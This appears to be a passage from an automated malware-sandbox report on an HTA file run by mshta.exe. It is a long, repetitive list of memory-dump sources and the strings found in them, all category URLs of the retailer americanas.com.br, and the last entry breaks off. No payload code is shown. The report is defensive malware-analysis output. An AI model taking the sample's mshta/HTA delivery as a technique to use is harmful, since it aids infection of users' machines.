Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444767802.000000000950D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484826803.000000000950E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411529883.0000000009507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/instrumentos
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/instrumentos-musicais?chave=pfm_home_instrumentos_menu
Source: mshta.exe, 00000000.00000003.25402097354.000000000AC33000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25426074668.0000000009C1B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402958159.000000000AAD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25435624253.0000000009C1D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387679114.000000000ABC0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422689063.0000000009C1A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488311593.000000000AC36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411154333.000000000AAD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/livros?chave=dk_hm_at_livros
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25429809618.0000000009C48000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462689449.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402044364.000000000ABF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.000000000946E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25435929209.0000000009C4A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488630378.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25429545584.0000000009C47000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/livros?chave=pfm_home_livros_menu
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25437694925.0000000009C5B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477736639.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398339352.0000000009C5B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25479000950.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488441042.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422811267.0000000009C5B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/malas-mochilas-e-acessorios?chave=pfm_home_malas_menu
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477835168.000000000AC03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401685590.000000000ABFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401236979.000000000A9B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/mercado/alimentos?chave=pc_cat_menu_mercearia_mercado
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486323410.000000000A9BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25489837872.000000000B648000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401236979.000000000A9B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398642519.000000000B648000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401507649.000000000AC06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebes?chave=pc_cat_menu_bebes_mercado
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebes?chave=pc_cat_menu_bebes_mercadoT
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebidas/bebidas-alcoolicas/vinhoq
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A948000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444186991.000000000A948000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485650837.000000000A948000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebidas/bebidas-alcoolicas?chave=pc_cat_menu_bebidas
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488396530.000000000AC56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477736639.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402424995.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.000000000946C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebidas/bebidas-nao-alcoolicas?chave=pc_cat_menu_beb
Source: mshta.exe, 00000000.00000003.25402097354.000000000AC33000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488311593.000000000AC36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401903465.000000000AC27000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401838854.000000000AC13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebidas?chave=dk
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383700341.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404755230.000000000AB34000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387679114.000000000ABC0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401588246.000000000ABC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebidas?chave=dk_hm_at_bebidas
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bebidas?chave=dk_hm_at_bebidas-
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486323410.000000000A9BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387679114.000000000ABC0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401588246.000000000ABC1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401236979.000000000A9B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/mercado/bomboniere?chave=pc_cat_menu_bombiniere_mercado
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25436096053.0000000009C15000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402044364.000000000ABF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25429674983.0000000009C14000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado?chave=pc_cat_home_depart_mercado
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado?chave=pc_cat_home_depart_mercado)
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459239751.0000000009473000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484186260.0000000009474000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402958159.000000000AAD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398339352.0000000009C5B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411154333.000000000AAD5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403038428.000000000AA70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488009024.000000000ABF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado?chave=pc_cat_menu_mercado
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458566580.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25482972272.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: 